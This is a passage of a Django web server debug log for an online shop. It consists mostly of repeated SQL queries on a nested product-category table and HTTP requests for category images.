"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:31:30,149 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:31:30,151 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:31:30,154 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:31:30,156 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:31:30,158 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:31:30,161 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:31:30,163 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:31:30,166 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:31:30,168 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:31:30,170 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:31:30,172 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:31:30,175 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:31:30,177 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:31:30,179 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:31:30,182 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:31:30,185 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:31:30,189 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:31:30,191 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:31:30,194 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:31:30,196 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:31:30,198 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:31:30,200 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:31:30,202 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:31:30,205 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:31:30,207 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:31:30,210 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:31:30,212 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:31:30,214 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:31:30,217 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:31:30,219 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:31:30,221 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:31:30,223 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:31:30,225 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:31:30,228 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:31:30] "GET /api/v1/categories/ HTTP/1.0" 200 8596 [13/Dec/2019 13:31:30] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [13/Dec/2019 13:31:30] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:30] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [13/Dec/2019 13:31:30] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [13/Dec/2019 13:31:30] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [13/Dec/2019 13:31:30] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [13/Dec/2019 13:31:32] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [13/Dec/2019 13:31:32] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [13/Dec/2019 13:31:32] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [13/Dec/2019 13:31:32] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [13/Dec/2019 13:31:32] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:33] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:34] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [13/Dec/2019 13:31:34] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:34] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:34] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:34] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:35] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:35] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [13/Dec/2019 13:31:35] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [13/Dec/2019 13:31:35] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [13/Dec/2019 13:31:36] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [13/Dec/2019 13:31:36] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [13/Dec/2019 13:31:36] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [13/Dec/2019 13:31:37] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [13/Dec/2019 13:31:37] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [13/Dec/2019 13:31:37] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [13/Dec/2019 13:31:37] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [13/Dec/2019 13:31:38] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [13/Dec/2019 13:31:38] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [13/Dec/2019 13:31:38] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [13/Dec/2019 13:31:39] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [13/Dec/2019 13:31:39] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [13/Dec/2019 13:31:39] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [13/Dec/2019 13:31:39] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [13/Dec/2019 13:31:40] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [13/Dec/2019 13:31:40] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [13/Dec/2019 13:31:40] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [13/Dec/2019 13:31:40] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [13/Dec/2019 13:31:41] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [13/Dec/2019 13:31:41] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [13/Dec/2019 13:31:41] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [13/Dec/2019 13:31:42] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [13/Dec/2019 13:31:42] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 [13/Dec/2019 13:31:42] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 DEBUG 2019-12-13 13:32:29,406 utils 11259 139831552767744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:32:29,417 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:32:29,422 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:32:29,426 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:32:29,431 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:32:29,435 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:32:29,439 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:32:29,443 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:32:29,447 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:32:29,453 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:32:29,457 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:32:29,461 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:32:29,465 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:32:29,470 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:32:29,475 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:32:29,482 utils 11259 139831552767744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:32:29,487 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:32:29,491 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:32:29,495 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:32:29,500 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:32:29,504 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:32:29,508 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 